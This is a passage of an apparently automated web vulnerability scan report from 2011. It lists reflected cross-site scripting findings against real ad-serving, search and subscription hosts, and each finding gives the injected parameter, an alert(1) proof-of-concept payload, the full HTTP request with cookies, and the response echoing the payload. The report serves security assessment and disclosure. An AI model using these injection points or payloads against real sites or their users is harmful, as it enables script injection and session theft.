The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ac00'-alert(1)-'fb3b0cd2a48 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:45 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:45 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=1091329ac00'-alert(1)-'fb3b0cd2a48&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26s
...[SNIP]...
5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a78e'-alert(1)-'f8fecf152f0 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:53 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:53 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b8a78e'-alert(1)-'f8fecf152f0&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DI
...[SNIP]...
5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f615'-alert(1)-'c0e60859184 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:37:58 GMT
Expires: Sat, 26 Mar 2011 01:37:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=8f615'-alert(1)-'c0e60859184https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnbr%3D6430098999I%26cc%3DUS%26producttypecd%3DIP%26source
...[SNIP]...
5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da786'-alert(1)-'98c2520a2a5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:41 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:41 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...
5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 48579<script>alert(1)</script>8f27a3ba150 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=225976848579<script>alert(1)</script>8f27a3ba150&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2507


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "225976848579<script>alert(1)</script>8f27a3ba150"

   
                                                           </head>
...[SNIP]...
5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 70de1--><script>alert(1)</script>17479fecbed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=151562570de1--><script>alert(1)</script>17479fecbed&pid=2259768&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:53 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3400
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151562570de1--><script>alert(1)</script>17479fecbed" -->
...[SNIP]...
5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 87ebb--><script>alert(1)</script>fd77cc4c5e6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=2259768&ps=-187ebb--><script>alert(1)</script>fd77cc4c5e6&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3839
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-187ebb--><script>alert(1)</script>fd77cc4c5e6" -->
   
...[SNIP]...
5.31. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee was submitted in the q parameter. This input was echoed as ca1a8<img src=a onerror=alert(1)>58aa3f015ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps.default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 9a3fe25a47d543bab74c1bbffe2e1322
Date: Sat, 26 Mar 2011 01:03:07 GMT
Connection: close

{"AS":{"Query":"ca1a8<img src=a onerror=alert(1)>58aa3f015ee","FullResults":1}}
5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd650"><script>alert(1)</script>4a55cdcca00 was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=Scd650"><script>alert(1)</script>4a55cdcca00 HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="PGTP" value="Scd650"><script>alert(1)</script>4a55cdcca00">
...[SNIP]...
5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload f5b59<script>alert(1)</script>e93d24ee706 was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586f5b59<script>alert(1)</script>e93d24ee706&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Web Ca
...[SNIP]...
<BR>
ERROR: Web Page is corrupted! Wrong PUBID=586F5B59<SCRIPT>ALERT(1)</SCRIPT>E93D24EE706.<BR>
...[SNIP]...
5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the RDRID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87621"><script>alert(1)</script>5029ac893ef was submitted in the RDRID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=87621"><script>alert(1)</script>5029ac893ef&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
